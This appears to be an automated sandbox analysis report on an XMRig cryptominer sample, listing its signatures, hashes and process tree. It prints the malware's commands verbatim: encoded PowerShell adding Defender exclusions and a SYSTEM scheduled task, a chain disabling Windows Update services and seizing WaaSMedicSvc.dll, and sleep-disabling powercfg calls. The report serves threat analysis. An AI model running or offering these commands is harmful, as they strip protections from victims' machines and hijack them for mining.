Analysis
-
max time kernel
302s -
max time network
266s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
23-08-2022 22:15
General
-
Target
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
-
Size
7.0MB
-
MD5
bd239d9eef85d149f36a7fe0bd2ba851
-
SHA1
4bec39f7dde972db05a9d5b632a1270835948939
-
SHA256
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
-
SHA512
9cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
-
SSDEEP
196608:Ss1EweUJOIkMdPU+W+RU5eltspYA+QPjBBQWHNGm:Ss1E9UkzM6e4v7obm
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 6 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAawBsAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAGoAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AegBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcwBsACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdABrAHIAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABrAEEAWgB3AEIAeQBBAEcAUQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAFIAdwBCAHYAQQBHADgAQQBaAHcAQgBzAEEARwBVAEEAWABBAEIARABBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBaAFEAQgBjAEEASABVAEEAYwBBAEIAawBBAEcARQBBAGQAQQBCAGwAQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEwAUQBCAFcAQQBHAFUAQQBjAGcAQgBpAEEAQwBBAEEAVQBnAEIAMQBBAEcANABBAFEAUQBCAHoAQQBDAEEAQQBQAEEAQQBqAEEASABrAEEAYwB3AEIAdgBBAEcAZwBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwByAGMAeABxACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAdAB5AGoAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAHAAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBpAHoAZwBsACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANABlADYAOAAzADkAYwBmADAAMQBmADcAMgBlADUAOQA4AGIANgA3ADMAYwBlAGIAZQA3AGMANwAzADMAYgA4ADgAZABkADMAYQBhADIANgBlADgAMwBiAGUANgA0ADkAYQA0AGQANgA0ADYAYgBhAGEANgA0AGMAMwBiADQAZgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG4AbQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAYwBsAG0AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHkAZwByAGQAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAHkAcwBvAGgAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAawBsAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAGoAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AegBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcwBsACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "duxiidbcn"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe kjsoqgrdspbcfzi1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8akfEvBj2votiBG328vkx0bHTFFl8IR/D6WxVebpF3p54⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD5bd239d9eef85d149f36a7fe0bd2ba851
SHA14bec39f7dde972db05a9d5b632a1270835948939
SHA2564e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
SHA5129cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD5bd239d9eef85d149f36a7fe0bd2ba851
SHA14bec39f7dde972db05a9d5b632a1270835948939
SHA2564e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
SHA5129cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ab1b6ad93b9e9348d162954800469dcf
SHA188cfe80e1a2609b1a7275e2f56e2eb1c4e20bde6
SHA256a00aadd40bec3adb4dd31fcc9bbd36cd07180072202723a816792fa9dfd15060
SHA512c8fe55cc1c3baedd57572261fe6dd24e1da3ed6b45724a2202e42d1c653ac57e7280467fc3ade8af4251a713464ec24d15f8b062105938d52bb201b8fb7f3c99
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/188-264-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmpFilesize
1.9MB
-
memory/188-259-0x0000000000000000-mapping.dmp
-
memory/188-265-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/188-262-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/188-263-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/188-266-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmpFilesize
1.9MB
-
memory/500-250-0x0000000000000000-mapping.dmp
-
memory/512-248-0x0000000000000000-mapping.dmp
-
memory/528-470-0x0000000000000000-mapping.dmp
-
memory/584-247-0x0000000000000000-mapping.dmp
-
memory/1008-249-0x0000000000000000-mapping.dmp
-
memory/1020-186-0x0000000000000000-mapping.dmp
-
memory/1112-178-0x0000000000000000-mapping.dmp
-
memory/1456-187-0x0000000000000000-mapping.dmp
-
memory/1508-177-0x0000000000000000-mapping.dmp
-
memory/1700-469-0x0000000000000000-mapping.dmp
-
memory/1924-424-0x0000000000000000-mapping.dmp
-
memory/2056-131-0x0000021034330000-0x000002103474E000-memory.dmpFilesize
4.1MB
-
memory/2056-126-0x000002104F340000-0x000002104F75E000-memory.dmpFilesize
4.1MB
-
memory/2068-129-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/2068-121-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/2068-128-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmpFilesize
1.9MB
-
memory/2068-120-0x0000000000400000-0x0000000001056000-memory.dmpFilesize
12.3MB
-
memory/2176-455-0x0000000000000000-mapping.dmp
-
memory/2212-431-0x0000000000000000-mapping.dmp
-
memory/2316-444-0x0000013921360000-0x0000013921372000-memory.dmpFilesize
72KB
-
memory/2316-438-0x0000013921330000-0x0000013921336000-memory.dmpFilesize
24KB
-
memory/2468-454-0x0000000000000000-mapping.dmp
-
memory/2612-430-0x0000000000000000-mapping.dmp
-
